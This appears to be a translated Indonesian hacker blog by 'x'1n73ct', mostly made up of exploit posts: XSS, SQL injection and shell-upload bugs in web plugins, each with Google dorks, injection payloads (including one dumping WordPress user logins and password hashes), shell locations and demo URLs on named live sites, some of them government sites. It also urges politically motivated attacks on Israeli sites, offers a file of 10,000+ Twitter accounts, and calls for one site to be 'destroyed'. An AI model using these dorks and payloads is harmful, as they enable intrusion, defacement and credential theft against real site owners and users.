Open apology to IBT (Indonesian Backtrack Team)

To the admins and all members of IBT (Indonesian Backtrack Team)

I, as one of the admins of IFC (Indonesian Fighter Cyber), representing the 7 other admins,
hereby apologize to the admins and members of IBT (Indonesian Backtrack Team)
for our unintentional similarity between the logos of IFC ( http://i.imgur.com/lQbfl.png ) and IBT ( http://indonesianbacktrack.or.id/forum/ ),
and we will update our logo soon.

Let us move forward together for the unity of NKRI in the cyber world. Although Indonesia has many hacking and cyber groups and various differences, we have one common goal, namely "to advance Indonesia, especially in the cyber world".

"Never be divided despite the differences we have; we can stand because of differences, NKRI can stand because of differences", and hold to our nation's motto, "Bhinneka Tunggal Ika".

Regards from me,

x'1n73ct

XSS bug on the "Australian Federal Police" website

[ type attack ]
xss injection

[ web vuln ]
http://www.afp.gov.au/Search.aspx?searchTerm=

[ script injection ]
"<script>alert('hey admin this web vuln XSS by X 1n73ct')</script>

[ demo ]

http://www.afp.gov.au/





SQL injection bug in "Imagine virtual design"

[ type attack ]
SQL Injection

[ dork ]
intext:"Design by imagine virtual" inurl:".php?id="

[ demo ]
http://www.incasadesign.com/quadros.php?id=-204' UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+

[ details ]
inj3ct0r 


File upload bug in "PDW File Browser"

[ type attack ]
tamper data

[ dork ]
inurl:"pdw_file_browser"

intext:Upload a new file intitle:PDW File Browser v1.3

intitle:Index of /pdw_file_browser/ intext:Parent Directory 


[ shell location ]
site.com/pdw_file_browser/img/yourshell.php.jpg
site.com/pdw_file_browser/img/yourshell.php 

[ demo ]
http://dudleycil.org.uk/pdw_file_browser/ 

[ detail ]
inj3ct0r

SQL injection bug in Joomla component "com_jooproperty"

[ type attack ]
Sql Injection

[ dork ]
inurl:option=com_jooproperty product_id=

[ demo ]
http://www.litsabaldaquin.com/short_term_rental/index.php?option=com_jooproperty&view=booking&layout=modal&product_id=1'

SQL injection bug in KeenLook developer


[ type attack ]
sql injection

[ dork ]
Powered By KeenLook inurl:catalogue.php?page=

[ demo ]
  
[ details ]

SQL injection bug in "Espacio Ecuador"

[ type attack ]
sql injection

[ dork ]
intext:"developed by Espacio Ecuador"  inurl:id=

[ demo ]
http://www.mytripecuador.com/ecuador-hotels/hotel.php?id=25

[ details ]
http://cxsecurity.com/issue/WLB-2012110228

SQL injection bug in "Seventeen Design"

[ type attack ]
sql injection

[ dork ]
intext:"Producido por: Seventeen Design." inurl:id=

[ demo ]
http://www.monteavila.gob.ve/mae/detail_new.php?id=147'

[ details ]
http://cxsecurity.com/issue/WLB-2012110225

File upload bug in "Joomla Component com_smartformer"

[ type attack ]
tamper data

[ dork ]
inurl:index.php?option=com_smartformer  inurl:itemid= intext:Upload

[ demo ]
http://www.goodarch2u.com.my/index.php?option=com_smartformer&Itemid=439&lang=en
http://www.finenge.com/en/index.php?option=com_smartformer&Itemid=90

[ shell location ]
site/components/com_smartformer/files/yournameshell.php

[ details ]
http://1337day.com/exploit/19825

SQL injection bug in the "WordPress st_newsletter" plugin

[ type attack ]
sql injection

[ dork ]
allinurl:stnl_iframe.php?newsletter=

[ demo ]
http://preventcancernow.ca/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=7



SQL injection bug in the "WordPress wp-imagezoom" plugin

[ type attack ]
sql injection

[ dork ]
allinurl:wp-imagezoom/zoom.php?id=

[ demo ]
http://asiasons.com/wp-content/plugins/wp-imagezoom/zoom.php?id=GnAaX

SQL injection bug in "WordPress dailyedition-mouss Theme"

[ type attack ]
SQL injection

[ dork ]
inurl:fiche-artiste.php?id=

inurl:themes/dailyedition-mouss/fiche-artiste.php?id=

[ demo ]
http://hotnewrap.net/wp-content/themes/dailyedition-mouss/fiche-artiste.php?id=383

File upload bug in the "WordPress Zarzadzanie Kontem" plugin (ajax file manager)

Let's go straight to the PoC
[ type attack ]
tamper data

[ dork ]
inurl:"ajaxfilemanager.php?page=" intitle:ajax file manager

[ demo ]
http://www.madiunkab.go.id/qwerty/filemanager/ajaxfilemanager.php?page=3
http://www.hacker-motor.com/javascript/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php?page=5

SQLi bug in WordPress plugin "plg_novana"


[ type attack ]
sql injection

[ dork ]
inurl:novana_detail.php?**id=

[ exploit ]
/wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=[sql]

[ demo ]
http://avenuepattaya.net/wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=-35+union+select+1,2,3,4,5,6,7,8,9,group_concat%28user_login,user_pass%29,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users-- 

[ detail ]
http://1337day.com/exploit/19787

SQL injection bug in "girl.php"

[ type attack ]
sql injection

[ dork ]
inurl:girl.php?id=

[ demo ]
http://www.btsfashionshow.com/girl.php?id=6
http://www.aramis-london-escorts.com/girl.php?id=301
http://www.pornescort.xxx/girl.php?id=68 <== must be destroyed ^_^

10,000+ Twitter accounts

Straight to it

If I posted them all it would get too long, so it's better to download my file here

File upload bug in "WordPress Plugin tdo-mini-forms"

[ type attack ]
tamper data

[ dork ]
inurl:tdomf-upload-inline.php?tdomf_form_id= intext:Upload

[ link upload file ]
site/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP;.jpg

[ example ]
wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP;.jpg

[ demo ]
http://www.tutufoundationusa.org/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=

[ details ]
http://1337day.com/exploit/19776

SQL injection bug on Israeli websites

This is not the time for us to stay silent and sit idly by,
while our brothers and sisters in Palestine are under attack by the Zionist state of Israel,
while civilians and children are becoming victims.

Map of Palestine 1946 - 2000 (what about the map of the country where the Al-Aqsa Mosque stands)


save palestine

inurl:index.php?m_id= site:il
inurl:*.php?m_id= site:il


        ===[ Teamr00t | Anonymous | IFC | all Indonesian Hacker |  Gaza Hacker  ]====

File upload bug in "jQuery-FileUpload"

Straight to it

[ type attack ]
tamper data

[ dork ]
intitle:upload intext:Add files.. "Start upload" Cancel upload Delete

[ vuln ]
http://konceptsigngroup.com/jQuery-FileUpload/index.html

[ demo ]
http://konceptsigngroup.com/jQuery-FileUpload/server/php/thumbnails/anonymous%20muslim.jpg

File upload bug in "Plugins Spotlight" on WordPress

Apart from the problem of my Facebook account being kicked out by Facebook, this time I am here bringing a new exploit :)

[ type attack ]
tamper data & shell upload

[ dork ]
intitle:index of /../plugins/spotlightyour/monetize/ intext:Parent Directory "upload/"

inurl:wp-content monetize/upload/ intext:Uploading Please wait ... Uploaded Successfully.

inurl:wp-content/plugins/spotlightyour/

[ exploit ]
http://site/wp-content/plugins/spotlightyour/monetize/upload/

[ shell access ]
wp-content/uploads/[year]/[month]/[search your shell].php

[ example ]
http://pure-cashmere-pashmina-scarves.com/wp-content/plugins/spotlightyour/monetize/upload/

Announcement [ I am off Facebook ]

Sorry, friends; to my friends on Facebook, I apologize,

because my FB account is inactive after being kicked out by Facebook headquarters; I can no longer log in to the x'inject account.
I don't know why I keep getting kicked out by Facebook; maybe I'm a "fugitive" xixixixixi ^_^
I will keep making new accounts, even up to part 100, as long as it's free.
Don't get tired of adding me.

Please spread this news on my account so that other friends know that I can no longer log in to the x'inject account.

For now I will be off Facebook. To my friends who made me an admin, please remove my x'inject account from your groups right away so that nothing unwanted happens.

Meanwhile I will be active on the forums I run and on this blog of mine.

Thank you for your attention.

Regards from me,

 x'1n73ct

File upload bug in "TinyBrowser"

hehehe, this is actually the result of a dork I developed from a report on inj3ct0r
Straight to it

[ exploit ]

[ type attack ]
tamper data

[ new dork ]
inurl:tinybrowser/upload.php

intitle:Index of / intext:Parent Directory "tinybrowser/"

inurl:/tinybrowser/ intitle:TinyBrowser :: ext:php

inurl:tinybrowser/upload.php intext:Enviar Arquivos intitle:TinyBrowser :: Upload

inurl:type=image& intext:Enviar Arquivos intitle:TinyBrowser :: Upload

[ demo ]
http://www.maspa.com.br/clientes/lj/admin/js/tiny_mce/plugins/tinybrowser/upload.php

[ example ]
http://www.maspa.com.br/uploads/images/_thumbs/_anonymous_muslims.jpg

[ details ]
http://1337day.com/exploit/19732

File upload bug in Joomla "com_autostand"

Let's go straight to the exploit :)

[ type attack ]
tamper data

[ dork ]
inurl:index.php?option=** func=newItem intext:Select Image Add a Car

inurl:index.php?option=** func=newItem intext:Select Image Publish Only available to admin

inurl:index.php?option=com_autostand

[ poc ]
site/inurl:index.php?option=com_autostand&func=newItem

[ demo ]
http://www.karahan.be//index.php?option=com_autostand&func=newItem

SQL injection bug in "like.php"

This time I will post about a SQL injection bug in like.php. Let's check it out right away :)


[ type attack ]
sql injection

[ dork ]
inurl:like.php?id= intext:LikeItNow Script © 2010

[ demo ]
http://neonapster.net23.net/like.php?id=34%27


WELCOME

WELCOME TO MY BLOG BY X'1N73CT